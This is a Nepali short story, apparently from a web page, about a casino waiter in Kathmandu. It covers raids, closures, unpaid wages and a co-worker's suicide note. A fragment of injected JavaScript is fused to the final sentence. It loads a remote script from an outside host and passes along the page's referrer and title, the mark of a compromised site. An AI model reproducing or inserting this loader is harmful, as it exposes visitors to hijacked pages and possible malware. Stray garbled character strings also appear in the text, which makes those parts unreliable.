चुरोटको धुवाँले हल पूरै तुवाँलो लागेजस्तै देखिएथ्यो । जता हेर्यो मान्छे मान्छे, रात्रिकालीन बजारजस्तो । बिजुलीबत्तीले झकिझकाउ । कुनै कुर्सी खालि छैनन् । कोही खाँदैछन्, कोही अरुको खेलेको हेर्र्दै छन् । पाकाहरु छेउमा रहेको स्न्याक्सको मतलब नगरी एकतमासले खेल्नमै मस्त छन् । बच्चाहरु मेसिनमा सिक्का हाल्दै आफ्नो लक्की अङ्क पर्खिरहेछन् । आफ्ना बाबाआमासँग अर्को प्याकेट सिक्का किनिदिन भनिरहेका छन् । बोनसको पर्खाइमा सिक्काहरु मेसिनमा चडाइरहेका छन् ।पजबमबलमचब उबगमभ
िनर्तकनर्तकीहरु कहिले हिन्दी त कहिले नेपाली गीतमा नाचिरहेका छन् । गेस्टहरुलाई झुमिरहेका छन् । मदिराले मातिएका गेस्टहरु नर्तकीको नाचले हौसिएका छन् । पैसको वर्षा गरिरहेका छन् । स्टेज पूरै व्यवस्थित छ । रङ्गीविरङ्गी बत्तीले रेस्टुरेन्टको रौनकता नै बदलिदिएको छ ।
म्यारिज लेखिएको कोठा एकदम सान्त छ । सदाझैँ आज पनि उसलाई भ्याननभ्यानई छ । ऊ त झन् नयाँ स्टाफ, त्यसमाथि पुरानाहरुको पेलाइ । क्यासिनो छिरेको यही सेप्टेम्बर २५ तारिखका दिन चार महिना पुग्दै छ । ‘हामीले त भाइ पन्द्र महिनामा स्थायी लेटर पाको, माओवादीको युनियन छ । राम्रो काम गर्यौ भने ६ महिनामै स्थायी लेटर पाउन सक्छौ । यो युनियनले कन्ट्र्याकका सबै सेक्युरिटीलाई स्थायी गरिदियो । उसले कैयौँपटक यस्ता वाणी पुराना स्टाफहरुबाट सुनिसकेको छ ।
त्यसैले पनि उसलाई कामको हतारो अलि बढी नै छ । छ महिनामै आफ्नो जागिर बन्दिलो पार्नु छ । उसले बिस्तारै ढोका खोल्यो अनि गेस्टको अडर सर्भ गर्यो । चनाखो भएर कोठाको कुनामा उभियो । ‘भाइ यता आऊ त । ‘मलाई एक प्याक चिवास सोडा र एक प्याकेट सूर्य चुरोट, ‘मलाई नेवारी खाजा सेट । भाइ मलाई मटन सिकवाब, मलाई फ्रेस जुुस । उसले खुरु खरु गेस्टका सबै अडरहरुको केओटीबीओटी काट्यो । गेस्टहरु प्रायः सबै नेपाली नै छन् । त्यसैले अडर पनि नियमितझैँ उस्तै छ ।
म्यारिज हलबाट बाहिर निस्कन मात्रै के लागेको थियो ऊ कसैको आवजले टक्क रोकियो । ‘बेटा मुझे एक लेमन सोडा अर साप के लिए आलुपराठा खिलाओ । हस् म्याडम भन्दै गेस्टका अडर लिएर बार हुँदै किचनतिर लाग्यो ।
कोही मेरो डबल टनेला पर्यो । मलाई ब्याकलेबलको कुपन भन्दै थियो । कोही घर जान गाडीको कुपन मागिरहेथ्यो । सुपरभाइजर गेस्टलाई कुपन दिँदै छन् । कुल्पियर सदाझैँ तास फिट्दै छिन् । म्यारिज खेलाउँदै छिन् । छिन् छिनमा स्टाफ बद्लिरहन्छन् । आँखा चिम्रा पारेर खेल्नेहरु तिनै छन् । बाहिर दिनरात चलिरहन्छ, भित्र माहोल एउटै छ । न दिन हुन्छ, न रात हुन्छ । भएभरको पैसा सकिँदा दिउँसै रात पर्छ । पैसा जित्दा सधैँ दिनै मात्र । त्यसैले त क्यासिनोको मज्जा नै बेग्लै छ !
एकै ठाउँमा बस्दा बस्दा दिक्क भएर उसले यासो यताउता नजर डुलायो । यो महिना रात्रिकालीकन डिउटी परेको हुँदा निन्द्र भगाउन पनि यताउता त गर्नै पर्यो नि । आजको उसको जिम्मामा फ्ल (चल्ती फरास) र म्यारिज दुवै टेबलमा सर्भिस गर्ने डिउटी परेकाले कामको चाप बढेकै हो । फ्लस रुम शान्त छ । ११ बजे नै सबै गेस्टहरुलाई खाना खुवाइसकेकाले गर्दा केही घण्टालाई यता ढुक्क जस्तै छ । मोटामोटा मान्छेहरु क्यारामबोर्डका गटीजस्ता चिप्सका थाकका थाक आफ्ना अगाडि राखेर फ्लसमा (चल्ती फरास) मस्त देखिन्छन् ।
कोही ह्विस्की त कोही सिगारको धुवाँ उडाउँदै छन् । आवाज बन्द गरिएको भित्ताको ठूलो टिभीमा क्रिकेटचलिरहेको छ । उनीहरुको क्रिकेट म्याचमा कस्को कति स्कोर हुन्छ भन्नेमा पनि बाजी रहेको छ । न पैसा तिर्नेलाई चिन्ता छ, न पैसा लिने खुसी देखिन्छ । लाग्छ उनीहरुको दैनिक पेसा नै यही हो ।
क्यासिनोमा नेपाली प्रवेशनिषेध गरिएको कुरो उसलाई थाहा नै थिएन । बेला बेलामा प्रहरीले रेड हानेपछि मात्र नेपालीले क्यासिनो खेल्नु गैरकानुनी रहेछ भन्ने कुरा उसले चालपाएको न हो । उसो त त्यहाँ जागिर सुरु गरेपछि उसले क्यासिनोका सबै यथार्थ नजिकैबाट बुझ्ने मौका पायो ।
क्यासिनोमा खेल्नेहरु प्रायः सबै नेपालीहरु नै हुने । युरोपियन र अमेरिकनहरु शून्य प्रायः हून्थे भने बङगाली र इन्डियनहरु नियमित जस्तै हुने । पछिल्लो समय तिब्बतीयन र चाइनिजको राम्रो हब बन्दैथियो क्यासिनो ।
अङ्ग्रेजी नयाँ वर्ष र क्रिसमस इभमा क्यासिनोहरुमा पर्व लागेजस्तै हुने । विदेशी संस्कृति अपनाएको क्यासिनोले यो समय गेस्टको ओइरो नै लाग्थ्यो । अडर लिएर साध्य नै नहुने, भीडभाड धेरै हुँदा गेस्टको अडर थेगि नसक्नु नै हुने । भेटेर दिन पनि निकै सकस हुन्थ्यो । नियमित आइरहने गेस्टको अडरलाई भन्दा बाहेक थोरै पैसा खेल्ने नयाँ गेस्टलाई राम्रो सर्भिस दिनै गारो हुने ।
भिडभाड ज्यादा हुँदाकसैलाई कसैको मतलबै नहुने । विषेश ध्यान त भीआईपी गेस्टको मात्रै हुने । स्टाफलाई आठ घण्टा काटाउनु न थियो । कुनै नयाँ गेस्टले कम्प्लेन गरे पनि सबै उस्तै डे«समा ठाँटिएका ठिटालाई चिनेर साध्य नै छैन । गेस्टलाई स्टाफको नाम थाहा नै नहुने ।
क्यासिनोमा प्रवेश गर्ने कोही भोको नहुने, लन्च डिनरको बुफे सबै गेस्टलाई निःशुल्क थियो भने खाजाखाने समयमा स्न्याक्स ट्रली लागेकै हुन्थ्योे । खानकै लागि जोकोही छिरेको भए पनि टन्न खान्थ्यो जान्थ्यो । हार्ड ड्रिङ्कका लागि भने खेलको स्तर हेरिकन सर्भिस हुने तर साधारण चिसोको कुनै रोकावाट थिएन ।
दिनहरु बित्दै गए, उसले जागिर सुरु गरेको पनि छ महिना पुगिसकेछ । म्यानेजरले सँगै क्यासिनो प्रवेश गरेका सबै साथीलाई स्थायी लेटर दिनुभयो । सरकारले कर र रोयल्टी नतिरेको भन्दै क्यासिनोका मालिक अर्थात क्यासिनो किङ्गले चर्चित उसको क्यासिनोका साहुलाई कालोसूचीमा राखेर कारवाही अगाडि बढायो ।
प्रशासनले दैनिक रेड हान्न थालेपछि नियमितआउने नेपाली गेस्टहरुमा कमी हुनथाल्यो । नेपाली प्रवेशमा दैनिकको कडाइले त्यसको प्रत्यक्ष असर उसको नियमित तलबमा देखिनथाल्यो ।
विदेशी गेस्टहरु महिनामा एक दुईपल्ट मात्रै आउथे भने, महिनौ खेल्ने विदेशि गेस्टको खेल करोडबाट लाखौँ हुँदै हजारमा झरिसकेको हुन्थ्यो ।
विस्तारै प्रशासनले माओवादी कार्यकर्ताको भर्ती केन्द्र मानिएको क्यासिनोलाई पेल्दै गयो । क्यासिनोले पनि तिनै प्रशासनका मान्छेलाई प्रयोग गरेर केही समय टिकाउन सफल त भयो । पुलिस प्रशासनमा मासिक लाखौँको सेटिङ्गमा पनि बिनामालिक केही वर्ष चलेकै थियो ।
नेपाली प्रवेशमा सरकारले कडाइ गरेपछि क्यासिनोको कमाई ह्वात्तै घट्यो । कमजोर हुदै गएपछि त्यसैकोमौका छोपेर सरकारले क्यासिनोसम्बन्धी २५ करोडको धरौटी र वार्षिक ४ करोडको रोयल्टी लगाएत अन्य बाध्यकारी नियमावली जारी गरेर देशभर सञ्चालनमा रहेका सबै क्यासिनोहरु केही समय बन्द भए ।uu
सीमित स्वार्थ भएका दलालहरुको दबाबमा क्यासिनो सम्बन्धी नियामावली परिवर्तन गरेर राजधानीको पुरानै स्थानमा नयाँ कम्पनीको नाममा केही क्यासिनो सञ्चालनमा आएको उसले दखिरहेथ्यो । पाँचतारे होटलको स्वातित्वमा रहेको क्यासिनोका कर्मचारीको जिम्मा वापुन सञ्चालनको माग लिएर होटल प्रञ्गडमा शान्तिपूर्ण आन्दोलनको कार्यक्रम सुरु भयो ।
सुरुसुरुका शान्तिपूर्ण आन्दोलन हुनका दिनहरुमा उसको उत्साहजनकउपस्थिी रहेथ्यो । तीन महिनादेखिको आन्दोलनले खासै उपलब्धि लिन नसकेपछि कर्मचारीहरुको उपस्थिती घट्दै गहिरहेथ्यो । कर्मचारीहरुको धर्ना विलिन हुँदै गहिरहेको थियो ।
सदाझँै हिजो बिहान पत्रिका लिनपत्रिका पसलमा गएर पत्रिकामा प्रकाशित समाचारहरुमा आँखा डुलाउँदै थिए । एक्कासि क्यासिनोका कर्मचीिरद्वारा आत्महत्या शीर्षकको समाचारले मेरो ध्यान केन्द्रित गर्यौँ । उसैको पूर्ण सुसाइट नोटसमेत छापिएको थियो । क्यासिनोबाट आउन बाँकी छ महिनाको तलबको आशामा दालचामाल र घरभाडाको पचास हजार रुपियाँको बोज थेग्न नसकी मृत्यको बाटो अँगाल्न बाध्य छु ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;